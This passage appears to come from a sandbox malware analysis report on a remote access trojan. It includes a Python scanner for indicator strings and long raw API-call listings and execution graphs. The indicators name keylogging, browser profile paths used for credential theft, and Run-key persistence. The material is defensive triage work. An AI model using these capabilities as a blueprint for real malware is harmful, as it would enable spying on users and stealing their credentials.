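The String IDs in the listings above (the keylogger status messages, the [AltL]/[AltR]/[CtrlL]/[CtrlR] modifier tags, the Chrome/Edge/Opera profile paths, alarm.wav and the Policies\Explorer\Run key) are enough for a first triage scan of a dump region. The following scanner is an added example and is not part of the Joe Sandbox report; the capability grouping, the helper names and the sample buffer are this example's own, and the buffer is constructed so the script runs stand-alone. Because the functions shown call the W variants (wsprintfW, PathFileExistsW, RegOpenKeyExW), the literals are normally stored as UTF-16LE, so each marker is searched in both ANSI and UTF-16LE form.

```python
import re

# Indicator strings taken from the String IDs in the listings above, grouped by
# the capability they point at. The grouping itself is this example's choice.
REMCOS_MARKERS = {
    "keylogger": [
        "Offline Keylogger Started",
        "Online Keylogger Stopped",
        "[AltL]", "[AltR]", "[CtrlL]", "[CtrlR]",
    ],
    "browser_paths": [
        "\\AppData\\Local\\Google\\Chrome\\",
        "\\AppData\\Local\\Microsoft\\Edge\\",
        "\\Opera Software\\Opera Stable\\",
    ],
    "persistence": [
        "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\",
    ],
    "audio": ["alarm.wav"],
}

IMAGE_BASE = 0x400000  # "Offset: 00400000" in the Memory Dump Source lines above


def marker_patterns(marker):
    """(encoding name, compiled bytes regex) pairs for one marker.

    The listed APIs are W variants, so UTF-16LE is the likely on-disk form;
    the ANSI form is tried as well so nothing is missed on a re-encoded copy.
    """
    return [
        ("ansi", re.compile(re.escape(marker.encode("ascii")))),
        ("utf16le", re.compile(re.escape(marker.encode("utf-16-le")))),
    ]


def scan(buf, markers=REMCOS_MARKERS, base=IMAGE_BASE):
    """Return sorted (file offset, virtual address, category, marker, encoding) hits."""
    hits = []
    for category, names in markers.items():
        for marker in names:
            for enc, pattern in marker_patterns(marker):
                for match in pattern.finditer(buf):
                    hits.append((match.start(), base + match.start(), category, marker, enc))
    hits.sort()
    return hits


def capabilities(hits):
    """Capability categories with at least one hit, sorted for stable output."""
    return sorted({hit[2] for hit in hits})


def build_sample():
    """Constructed dump fragment (not real data): zero filler around one UTF-16LE
    keylogger marker, one ANSI browser path and one UTF-16LE registry path."""
    filler = b"\x00" * 64
    return (
        filler
        + "Online Keylogger Stopped".encode("utf-16-le")
        + filler
        + b"\\AppData\\Local\\Google\\Chrome\\"
        + filler
        + "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\".encode("utf-16-le")
        + filler
    )


if __name__ == "__main__":
    found = scan(build_sample())
    for offset, va, category, marker, enc in found:
        print(f"{va:08x} {category:13s} {enc:7s} {marker}")
    print("capabilities:", ", ".join(capabilities(found)))
```

To run it against the real region, pass the bytes of the .sdmp file to scan(); the virtual addresses it prints assume the dump file starts at the listed base 0x400000. For the RegOpenKeyExW entry directly above, the hive handle 80000002 is HKEY_LOCAL_MACHINE and the access mask 00000002 is KEY_SET_VALUE, and the open is paired with RegDeleteValueW, so this particular function removes a value from the machine-wide Policies\Explorer\Run key; a hit on that string in a dump is worth checking against the key's current contents on the host.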
APIs
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: CommandLine
• String ID: 88
• API String ID: 3253501508-383729359
• Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
• Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
• Opcode Fuzzy Hash: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
• Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08

APIs
• MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401BD9), ref: 00440D77
• GetLastError.KERNEL32 ref: 00440D85
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0
• Opcode ID: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
• Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
• Opcode Fuzzy Hash: aa9c90e467390f2e0f6591fe7c9965b03d9b59885bed7a4237b1e33e934d31eb
• Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759

                                                                                                  APIs
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                                                                                  • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                                                                                  • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00411CB5
                                                                                                  • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 4100373531-0
                                                                                                  • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                  • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                                                                                  • Opcode Fuzzy Hash: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                                                                                  • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99

Execution Graph

Execution Coverage: 6.3%
Dynamic/Decrypted Code Coverage: 9.2%
Signature Coverage: 0.8%
Total number of Nodes: 2000
Total number of Limit Nodes: 60
API calls 39442->39444 39449 40e5ed memset memset 39443->39449 39444->39439 39444->39440 39444->39442 39445 40c231 _wcsicmp 39444->39445 39446 40c1d3 35 API calls 39444->39446 39445->39444 39447 40c248 39445->39447 39446->39444 39462 40c084 22 API calls 39447->39462 39450 414c2e 16 API calls 39449->39450 39451 40e63f 39450->39451 39452 409d1f 6 API calls 39451->39452 39453 40e658 39452->39453 39463 409b98 GetFileAttributesW 39453->39463 39455 40e667 39456 40e680 39455->39456 39457 409d1f 6 API calls 39455->39457 39464 409b98 GetFileAttributesW 39456->39464 39457->39456 39459 40e68f 39461 40c2d8 39459->39461 39465 40e4b2 39459->39465 39461->39372 39461->39373 39462->39444 39463->39455 39464->39459 39486 40e01e 39465->39486 39467 40e593 39468 40e5b0 39467->39468 39469 40e59c DeleteFileW 39467->39469 39471 40b04b ??3@YAXPAX 39468->39471 39469->39468 39470 40e521 39470->39467 39509 40e175 39470->39509 39472 40e5bb 39471->39472 39474 40e5c4 CloseHandle 39472->39474 39475 40e5cc 39472->39475 39474->39475 39477 40b633 free 39475->39477 39476 40e573 39479 40e584 39476->39479 39480 40e57c CloseHandle 39476->39480 39478 40e5db 39477->39478 39482 40b633 free 39478->39482 39552 40b1ab free free 39479->39552 39480->39479 39481 40e540 39481->39476 39529 40e2ab 39481->39529 39484 40e5e3 39482->39484 39484->39461 39487 406214 22 API calls 39486->39487 39488 40e03c 39487->39488 39489 40e16b 39488->39489 39490 40dd85 74 API calls 39488->39490 39489->39470 39491 40e06b 39490->39491 39491->39489 39492 40afcf ??2@YAPAXI ??3@YAXPAX 39491->39492 39493 40e08d OpenProcess 39492->39493 39494 40e0a4 GetCurrentProcess DuplicateHandle 39493->39494 39498 40e152 39493->39498 39495 40e0d0 GetFileSize 39494->39495 39496 40e14a CloseHandle 39494->39496 39499 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39495->39499 39496->39498 39497 40e160 39501 40b04b ??3@YAXPAX 39497->39501 39498->39497 39500 406214 22 API calls 39498->39500 39502 40e0ea 39499->39502 39500->39497 39501->39489 39503 
4096dc CreateFileW 39502->39503 39504 40e0f1 CreateFileMappingW 39503->39504 39505 40e140 CloseHandle CloseHandle 39504->39505 39506 40e10b MapViewOfFile 39504->39506 39505->39496 39507 40e13b CloseHandle 39506->39507 39508 40e11f WriteFile UnmapViewOfFile 39506->39508 39507->39505 39508->39507 39510 40e18c 39509->39510 39511 406b90 11 API calls 39510->39511 39512 40e19f 39511->39512 39513 40e1a7 memset 39512->39513 39514 40e299 39512->39514 39519 40e1e8 39513->39519 39515 4069a3 ??3@YAXPAX free 39514->39515 39516 40e2a4 39515->39516 39516->39481 39517 406e8f 13 API calls 39517->39519 39518 406b53 SetFilePointerEx ReadFile 39518->39519 39519->39517 39519->39518 39520 40e283 39519->39520 39521 40dd50 _wcsicmp 39519->39521 39525 40742e 8 API calls 39519->39525 39526 40aae3 wcslen wcslen _memicmp 39519->39526 39527 40e244 _snwprintf 39519->39527 39522 40e291 39520->39522 39523 40e288 free 39520->39523 39521->39519 39524 40aa04 free 39522->39524 39523->39522 39524->39514 39525->39519 39526->39519 39528 40a8d0 7 API calls 39527->39528 39528->39519 39530 40e2c2 39529->39530 39531 406b90 11 API calls 39530->39531 39551 40e2d3 39531->39551 39532 40e4a0 39533 4069a3 ??3@YAXPAX free 39532->39533 39535 40e4ab 39533->39535 39534 406e8f 13 API calls 39534->39551 39535->39481 39536 406b53 SetFilePointerEx ReadFile 39536->39551 39537 40e489 39538 40aa04 free 39537->39538 39539 40e491 39538->39539 39539->39532 39540 40e497 free 39539->39540 39540->39532 39541 40dd50 _wcsicmp 39541->39551 39542 40dd50 _wcsicmp 39543 40e376 memset 39542->39543 39544 40aa29 6 API calls 39543->39544 39544->39551 39545 40742e 8 API calls 39545->39551 39546 40e3e0 memcpy 39546->39551 39547 40e3b3 wcschr 39547->39551 39548 40e3fb memcpy 39548->39551 39549 40e416 memcpy 39549->39551 39550 40e431 memcpy 39550->39551 39551->39532 39551->39534 39551->39536 39551->39537 39551->39541 39551->39542 39551->39545 39551->39546 39551->39547 39551->39548 39551->39549 39551->39550 39552->39467 39555 40a980 
39553->39555 39554 40a8bb 39554->39392 39554->39393 39555->39554 39556 40a995 _wcsicmp 39555->39556 39557 40a99c wcscmp 39555->39557 39556->39555 39557->39555 39558->39396 39559->39400 39561 40aa23 RegEnumValueW 39560->39561 39561->39407 39561->39408 39563 405335 39562->39563 39564 40522a 39562->39564 39563->38993 39565 40b2cc 27 API calls 39564->39565 39566 405234 39565->39566 39567 40a804 8 API calls 39566->39567 39568 40523a 39567->39568 39607 40b273 39568->39607 39570 405248 _mbscpy _mbscat GetProcAddress 39571 40b273 27 API calls 39570->39571 39572 405279 39571->39572 39610 405211 GetProcAddress 39572->39610 39574 405282 39575 40b273 27 API calls 39574->39575 39576 40528f 39575->39576 39608 40b58d 27 API calls 39607->39608 39609 40b18c 39608->39609 39609->39570 39610->39574 39620 405220 39 API calls 39619->39620 39621 405369 39620->39621 39621->39425 39621->39426 39622->39428 39623->39432 39625->39426 39627 40440c FreeLibrary 39626->39627 39628 40436d 39627->39628 39629 40a804 8 API calls 39628->39629 39630 404377 39629->39630 39631 404383 39630->39631 39632 404405 39630->39632 39633 40b273 27 API calls 39631->39633 39632->38998 39632->39000 39632->39001 39634 40438d GetProcAddress 39633->39634 39635 40b273 27 API calls 39634->39635 39636 4043a7 GetProcAddress 39635->39636 39637 40b273 27 API calls 39636->39637 39647 404413 FreeLibrary 39646->39647 39648 40441e 39646->39648 39647->39648 39648->39015 39649->39011 39651 40442e 39650->39651 39653 40447e 39650->39653 39653->39011 39664 4135f6 39663->39664 39665 4135eb FreeLibrary 39663->39665 39665->39664 39693 403a29 39692->39693 39707 403bed memset memset 39693->39707 39695 403ae7 39720 40b1ab free free 39695->39720 39696 403a3f memset 39701 403a2f 39696->39701 39698 403aef 39698->39055 39699 409d1f 6 API calls 39699->39701 39700 409b98 GetFileAttributesW 39700->39701 39701->39695 39701->39696 39701->39699 39701->39700 39702 40a8d0 7 API calls 39701->39702 39702->39701 39704 40a051 GetFileTime CloseHandle 
39703->39704 39705 4039ca CompareFileTime 39703->39705 39704->39705 39705->39055 39706->39052 39708 414c2e 16 API calls 39707->39708 39709 403c38 39708->39709 39710 409719 2 API calls 39709->39710 39711 403c3f wcscat 39710->39711 39712 414c2e 16 API calls 39711->39712 39713 403c61 39712->39713 39714 409719 2 API calls 39713->39714 39715 403c68 wcscat 39714->39715 39721 403af5 39715->39721 39718 403af5 20 API calls 39719 403c95 39718->39719 39719->39701 39720->39698 39722 403b02 39721->39722 39723 40ae18 9 API calls 39722->39723 39725 403b37 39723->39725 39724 40ae51 9 API calls 39724->39725 39725->39724 39726 403bdb 39725->39726 39727 40add4 wcscmp wcscmp 39725->39727 39730 40ae18 9 API calls 39725->39730 39731 40aebe FindClose 39725->39731 39732 40a8d0 7 API calls 39725->39732 39728 40aebe FindClose 39726->39728 39727->39725 39729 403be6 39728->39729 39729->39718 39730->39725 39731->39725 39732->39725 39734 409d1f 6 API calls 39733->39734 39735 404190 39734->39735 39748 409b98 GetFileAttributesW 39735->39748 39737 40419c 39738 4041a7 6 API calls 39737->39738 39739 40435c 39737->39739 39741 40424f 39738->39741 39739->39080 39741->39739 39742 40425e memset 39741->39742 39744 409d1f 6 API calls 39741->39744 39745 40a8ab 9 API calls 39741->39745 39749 414842 39741->39749 39742->39741 39743 404296 wcscpy 39742->39743 39743->39741 39744->39741 39746 4042b6 memset memset _snwprintf wcscpy 39745->39746 39746->39741 39747->39078 39748->39737 39752 41443e 39749->39752 39751 414866 39751->39741 39753 41444b 39752->39753 39754 414451 39753->39754 39755 4144a3 GetPrivateProfileStringW 39753->39755 39756 414491 39754->39756 39757 414455 wcschr 39754->39757 39755->39751 39759 414495 WritePrivateProfileStringW 39756->39759 39757->39756 39758 414463 _snwprintf 39757->39758 39758->39759 39759->39751 39760->39084 39762 40b2cc 27 API calls 39761->39762 39763 409615 39762->39763 40026 413f4f 39999->40026 40002 413f37 K32GetModuleFileNameExW 40003 413f4a 40002->40003 40003->39146 40005 
413969 wcscpy 40004->40005 40006 41396c wcschr 40004->40006 40009 413a3a 40005->40009 40006->40005 40008 41398e 40006->40008 40031 4097f7 wcslen wcslen _memicmp 40008->40031 40009->39146 40011 41399a 40012 4139a4 memset 40011->40012 40013 4139e6 40011->40013 40032 409dd5 GetWindowsDirectoryW wcscpy 40012->40032 40015 413a31 wcscpy 40013->40015 40016 4139ec memset 40013->40016 40015->40009 40033 409dd5 GetWindowsDirectoryW wcscpy 40016->40033 40017 4139c9 wcscpy wcscat 40017->40009 40019 413a11 memcpy wcscat 40019->40009 40021 413cb0 GetModuleHandleW 40020->40021 40022 413cda 40020->40022 40021->40022 40023 413cbf GetProcAddress 40021->40023 40024 413ce3 GetProcessTimes 40022->40024 40025 413cf6 40022->40025 40023->40022 40024->39149 40025->39149 40027 413f2f 40026->40027 40028 413f54 40026->40028 40027->40002 40027->40003 40029 40a804 8 API calls 40028->40029 40030 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40029->40030 40030->40027 40031->40011 40032->40017 40033->40019 40034->39169 40035->39192 40037 409cf9 GetVersionExW 40036->40037 40038 409d0a 40036->40038 40037->40038 40038->39199 40038->39201 40039->39205 40040->39208 40041->39210 40042->39276 40044 40bba5 40043->40044 40091 40cc26 40044->40091 40047 40bd4b 40112 40cc0c 40047->40112 40052 40b2cc 27 API calls 40053 40bbef 40052->40053 40119 40ccf0 _wcsicmp 40053->40119 40055 40bbf5 40055->40047 40120 40ccb4 6 API calls 40055->40120 40057 40bc26 40058 40cf04 17 API calls 40057->40058 40059 40bc2e 40058->40059 40060 40bd43 40059->40060 40061 40b2cc 27 API calls 40059->40061 40062 40cc0c 4 API calls 40060->40062 40063 40bc40 40061->40063 40062->40047 40121 40ccf0 _wcsicmp 40063->40121 40065 40bc46 40065->40060 40066 40bc61 memset memset WideCharToMultiByte 40065->40066 40122 40103c strlen 40066->40122 40068 40bcc0 40069 40b273 27 API calls 40068->40069 40070 40bcd0 memcmp 40069->40070 40070->40060 40071 40bce2 40070->40071 40072 404423 37 API calls 40071->40072 40073 40bd10 
40072->40073 40073->40060 40074 40bd3a LocalFree 40073->40074 40075 40bd1f memcpy 40073->40075 40074->40060 40075->40074 40076->39290 40078 409a74 GetTempFileNameW 40077->40078 40079 409a66 GetWindowsDirectoryW 40077->40079 40078->39287 40079->40078 40080->39328 40081->39328 40082->39328 40083->39328 40084->39328 40085->39328 40086->39328 40087->39328 40088->39328 40089->39303 40090->39325 40123 4096c3 CreateFileW 40091->40123 40093 40cc34 40094 40cc3d GetFileSize 40093->40094 40095 40bbca 40093->40095 40096 40afcf 2 API calls 40094->40096 40095->40047 40103 40cf04 40095->40103 40097 40cc64 40096->40097 40124 40a2ef ReadFile 40097->40124 40099 40cc71 40125 40ab4a MultiByteToWideChar 40099->40125 40101 40cc95 CloseHandle 40102 40b04b ??3@YAXPAX 40101->40102 40102->40095 40104 40b633 free 40103->40104 40105 40cf14 40104->40105 40131 40b1ab free free 40105->40131 40107 40bbdd 40107->40047 40107->40052 40108 40cf1b 40108->40107 40110 40cfef 40108->40110 40132 40cd4b 40108->40132 40111 40cd4b 14 API calls 40110->40111 40111->40107 40113 40b633 free 40112->40113 40114 40cc15 40113->40114 40115 40aa04 free 40114->40115 40116 40cc1d 40115->40116 40181 40b1ab free free 40116->40181 40118 40b7d4 memset CreateFileW 40118->39282 40118->39283 40119->40055 40120->40057 40121->40065 40122->40068 40123->40093 40124->40099 40126 40ab6b 40125->40126 40130 40ab93 40125->40130 40127 40a9ce 4 API calls 40126->40127 40128 40ab74 40127->40128 40129 40ab7c MultiByteToWideChar 40128->40129 40129->40130 40130->40101 40131->40108 40133 40cd7b 40132->40133 40166 40aa29 40133->40166 40135 40cef5 40136 40aa04 free 40135->40136 40137 40cefd 40136->40137 40137->40108 40139 40aa29 6 API calls 40140 40ce1d 40139->40140 40141 40aa29 6 API calls 40140->40141 40142 40ce3e 40141->40142 40143 40ce6a 40142->40143 40174 40abb7 wcslen memmove 40142->40174 40144 40ce9f 40143->40144 40177 40abb7 wcslen memmove 40143->40177 40146 40a8d0 7 API calls 40144->40146 40149 40ceb5 40146->40149 40147 40ce56 40175 
40aa71 wcslen 40147->40175 40156 40a8d0 7 API calls 40149->40156 40151 40ce8b 40178 40aa71 wcslen 40151->40178 40152 40ce5e 40176 40abb7 wcslen memmove 40152->40176 40154 40ce93 40179 40abb7 wcslen memmove 40154->40179 40158 40cecb 40156->40158 40180 40d00b malloc memcpy free free 40158->40180 40160 40cedd 40161 40aa04 free 40160->40161 40162 40cee5 40161->40162 40163 40aa04 free 40162->40163 40164 40ceed 40163->40164 40165 40aa04 free 40164->40165 40165->40135 40167 40aa33 40166->40167 40173 40aa63 40166->40173 40168 40aa44 40167->40168 40169 40aa38 wcslen 40167->40169 40170 40a9ce malloc memcpy free free 40168->40170 40169->40168 40171 40aa4d 40170->40171 40172 40aa51 memcpy 40171->40172 40171->40173 40172->40173 40173->40135 40173->40139 40174->40147 40175->40152 40176->40143 40177->40151 40178->40154 40179->40144 40180->40160 40181->40118 40182->39344 40183->39351 37536 44dea5 37537 44deb5 FreeLibrary 37536->37537 37538 44dec3 37536->37538 37537->37538 40193 4148b6 FindResourceW 40194 4148f9 40193->40194 40195 4148cf SizeofResource 40193->40195 40195->40194 40196 4148e0 LoadResource 40195->40196 40196->40194 40197 4148ee LockResource 40196->40197 40197->40194 37712 415304 free 40198 441b3f 40208 43a9f6 40198->40208 40200 441b61 40381 4386af memset 40200->40381 40202 44189a 40203 442bd4 40202->40203 40204 4418e2 40202->40204 40205 4418ea 40203->40205 40383 441409 memset 40203->40383 40204->40205 40382 4414a9 12 API calls 40204->40382 40209 43aa20 40208->40209 40210 43aadf 40208->40210 40209->40210 40211 43aa34 memset 40209->40211 40210->40200 40212 43aa56 40211->40212 40213 43aa4d 40211->40213 40384 43a6e7 40212->40384 40392 42c02e memset 40213->40392 40218 43aad3 40394 4169a7 11 API calls 40218->40394 40219 43aaae 40219->40210 40219->40218 40234 43aae5 40219->40234 40220 43ac18 40223 43ac47 40220->40223 40396 42bbd5 memcpy memcpy memcpy memset memcpy 40220->40396 40224 43aca8 40223->40224 40397 438eed 16 API calls 40223->40397 40227 43acd5 40224->40227 40399 
4233ae 11 API calls 40224->40399 40400 423426 11 API calls 40227->40400 40228 43ac87 40398 4233c5 16 API calls 40228->40398 40232 43ace1 40401 439811 163 API calls 40232->40401 40233 43a9f6 161 API calls 40233->40234 40234->40210 40234->40220 40234->40233 40395 439bbb 22 API calls 40234->40395 40236 43acfd 40241 43ad2c 40236->40241 40402 438eed 16 API calls 40236->40402 40238 43ad19 40403 4233c5 16 API calls 40238->40403 40239 43ad58 40404 44081d 163 API calls 40239->40404 40241->40239 40245 43add9 40241->40245 40244 43ae3a memset 40246 43ae73 40244->40246 40245->40245 40408 423426 11 API calls 40245->40408 40409 42e1c0 147 API calls 40246->40409 40247 43adab 40406 438c4e 163 API calls 40247->40406 40250 43ad6c 40250->40210 40250->40247 40405 42370b memset memcpy memset 40250->40405 40252 43adcc 40407 440f84 12 API calls 40252->40407 40253 43ae96 40410 42e1c0 147 API calls 40253->40410 40256 43aea8 40257 43aec1 40256->40257 40411 42e199 147 API calls 40256->40411 40258 43af00 40257->40258 40412 42e1c0 147 API calls 40257->40412 40258->40210 40262 43af1a 40258->40262 40263 43b3d9 40258->40263 40413 438eed 16 API calls 40262->40413 40268 43b3f6 40263->40268 40272 43b4c8 40263->40272 40265 43b60f 40265->40210 40472 4393a5 17 API calls 40265->40472 40267 43af2f 40414 4233c5 16 API calls 40267->40414 40454 432878 12 API calls 40268->40454 40270 43af51 40415 423426 11 API calls 40270->40415 40280 43b4f2 40272->40280 40460 42bbd5 memcpy memcpy memcpy memset memcpy 40272->40460 40274 43af7d 40416 423426 11 API calls 40274->40416 40278 43b529 40462 44081d 163 API calls 40278->40462 40279 43af94 40417 423330 11 API calls 40279->40417 40461 43a76c 21 API calls 40280->40461 40284 43afca 40418 423330 11 API calls 40284->40418 40285 43b47e 40288 43b497 40285->40288 40457 42374a memcpy memset memcpy memcpy memcpy 40285->40457 40286 43b544 40289 43b55c 40286->40289 40463 42c02e memset 40286->40463 40458 4233ae 11 API calls 40288->40458 40464 43a87a 163 API calls 40289->40464 40290 
43afdb 40419 4233ae 11 API calls 40290->40419 40295 43b428 40306 43b462 40295->40306 40455 432b60 16 API calls 40295->40455 40297 43b56c 40300 43b58a 40297->40300 40465 423330 11 API calls 40297->40465 40298 43b4b1 40459 423399 11 API calls 40298->40459 40299 43afee 40420 44081d 163 API calls 40299->40420 40466 440f84 12 API calls 40300->40466 40302 43b4c1 40468 42db80 163 API calls 40302->40468 40456 423330 11 API calls 40306->40456 40308 43b592 40467 43a82f 16 API calls 40308->40467 40311 43b5b4 40469 438c4e 163 API calls 40311->40469 40313 43b5cf 40470 42c02e memset 40313->40470 40315 43b005 40315->40210 40319 43b01f 40315->40319 40421 42d836 163 API calls 40315->40421 40316 43b1ef 40431 4233c5 16 API calls 40316->40431 40319->40316 40429 423330 11 API calls 40319->40429 40430 42d71d 163 API calls 40319->40430 40320 43b212 40432 423330 11 API calls 40320->40432 40321 43b087 40422 4233ae 11 API calls 40321->40422 40322 43add4 40322->40265 40471 438f86 16 API calls 40322->40471 40326 43b22a 40433 42ccb5 11 API calls 40326->40433 40329 43b23f 40434 4233ae 11 API calls 40329->40434 40330 43b10f 40425 423330 11 API calls 40330->40425 40332 43b257 40435 4233ae 11 API calls 40332->40435 40336 43b129 40426 4233ae 11 API calls 40336->40426 40337 43b26e 40436 4233ae 11 API calls 40337->40436 40340 43b09a 40340->40330 40423 42cc15 19 API calls 40340->40423 40424 4233ae 11 API calls 40340->40424 40341 43b282 40437 43a87a 163 API calls 40341->40437 40343 43b13c 40427 440f84 12 API calls 40343->40427 40345 43b29d 40438 423330 11 API calls 40345->40438 40348 43b15f 40428 4233ae 11 API calls 40348->40428 40349 43b2af 40351 43b2b8 40349->40351 40352 43b2ce 40349->40352 40439 4233ae 11 API calls 40351->40439 40440 440f84 12 API calls 40352->40440 40355 43b2c9 40442 4233ae 11 API calls 40355->40442 40356 43b2da 40441 42370b memset memcpy memset 40356->40441 40359 43b2f9 40443 423330 11 API calls 40359->40443 40361 43b30b 40444 423330 11 API calls 40361->40444 40363 43b325 40445 
423399 11 API calls 40363->40445 40365 43b332 40446 4233ae 11 API calls 40365->40446 40367 43b354 40447 423399 11 API calls 40367->40447 40369 43b364 40448 43a82f 16 API calls 40369->40448 40371 43b370 40449 42db80 163 API calls 40371->40449 40373 43b380 40450 438c4e 163 API calls 40373->40450 40375 43b39e 40451 423399 11 API calls 40375->40451 40377 43b3ae 40452 43a76c 21 API calls 40377->40452 40379 43b3c3 40453 423399 11 API calls 40379->40453 40381->40202 40382->40205 40383->40203 40385 43a6f5 40384->40385 40391 43a765 40384->40391 40385->40391 40473 42a115 40385->40473 40389 43a73d 40390 42a115 147 API calls 40389->40390 40389->40391 40390->40391 40391->40210 40393 4397fd memset 40391->40393 40392->40212 40393->40219 40394->40210 40395->40234 40396->40223 40397->40228 40398->40224 40399->40227 40400->40232 40401->40236 40402->40238 40403->40241 40404->40250 40405->40247 40406->40252 40407->40322 40408->40244 40409->40253 40410->40256 40411->40257 40412->40257 40413->40267 40414->40270 40415->40274 40416->40279 40417->40284 40418->40290 40419->40299 40420->40315 40421->40321 40422->40340 40423->40340 40424->40340 40425->40336 40426->40343 40427->40348 40428->40319 40429->40319 40430->40319 40431->40320 40432->40326 40433->40329 40434->40332 40435->40337 40436->40341 40437->40345 40438->40349 40439->40355 40440->40356 40441->40355 40442->40359 40443->40361 40444->40363 40445->40365 40446->40367 40447->40369 40448->40371 40449->40373 40450->40375 40451->40377 40452->40379 40453->40322 40454->40295 40455->40306 40456->40285 40457->40288 40458->40298 40459->40302 40460->40280 40461->40278 40462->40286 40463->40289 40464->40297 40465->40300 40466->40308 40467->40302 40468->40311 40469->40313 40470->40322 40471->40265 40472->40210 40474 42a175 40473->40474 40476 42a122 40473->40476 40474->40391 40479 42b13b 147 API calls 40474->40479 40476->40474 40477 42a115 147 API calls 40476->40477 40480 43a174 40476->40480 40504 42a0a8 147 API calls 40476->40504 40477->40476 
40479->40389 40494 43a196 40480->40494 40495 43a19e 40480->40495 40481 43a306 40481->40494 40517 4388c4 14 API calls 40481->40517 40484 42a115 147 API calls 40484->40495 40485 415a91 memset 40485->40495 40486 43a642 40486->40494 40521 4169a7 11 API calls 40486->40521 40488 4165ff 11 API calls 40488->40495 40490 43a635 40520 42c02e memset 40490->40520 40494->40476 40495->40481 40495->40484 40495->40485 40495->40488 40495->40494 40505 42ff8c 40495->40505 40513 439504 13 API calls 40495->40513 40514 4312d0 147 API calls 40495->40514 40515 42be4c memcpy memcpy memcpy memset memcpy 40495->40515 40516 43a121 11 API calls 40495->40516 40497 4169a7 11 API calls 40498 43a325 40497->40498 40498->40486 40498->40490 40498->40494 40498->40497 40499 42b5b5 memset memcpy 40498->40499 40500 42bf4c 14 API calls 40498->40500 40503 4165ff 11 API calls 40498->40503 40518 42b63e 14 API calls 40498->40518 40519 42bfcf memcpy 40498->40519 40499->40498 40500->40498 40503->40498 40504->40476 40506 43817e 139 API calls 40505->40506 40507 42ff99 40506->40507 40508 42ffe3 40507->40508 40509 42ffd0 40507->40509 40512 42ff9d 40507->40512 40523 4169a7 11 API calls 40508->40523 40522 4169a7 11 API calls 40509->40522 40512->40495 40513->40495 40514->40495 40515->40495 40516->40495 40517->40498 40518->40498 40519->40498 40520->40486 40521->40494 40522->40512 40523->40512 40545 41493c EnumResourceNamesW 37540 4287c1 37541 4287d2 37540->37541 37542 429ac1 37540->37542 37543 428818 37541->37543 37544 42881f 37541->37544 37558 425711 37541->37558 37557 425ad6 37542->37557 37610 415c56 11 API calls 37542->37610 37577 42013a 37543->37577 37605 420244 97 API calls 37544->37605 37549 4260dd 37604 424251 120 API calls 37549->37604 37551 4259da 37603 416760 11 API calls 37551->37603 37556 429a4d 37560 429a66 37556->37560 37561 429a9b 37556->37561 37558->37542 37558->37551 37558->37556 37559 422aeb memset memcpy memcpy 37558->37559 37563 4260a1 37558->37563 37573 4259c2 37558->37573 37576 425a38 37558->37576 
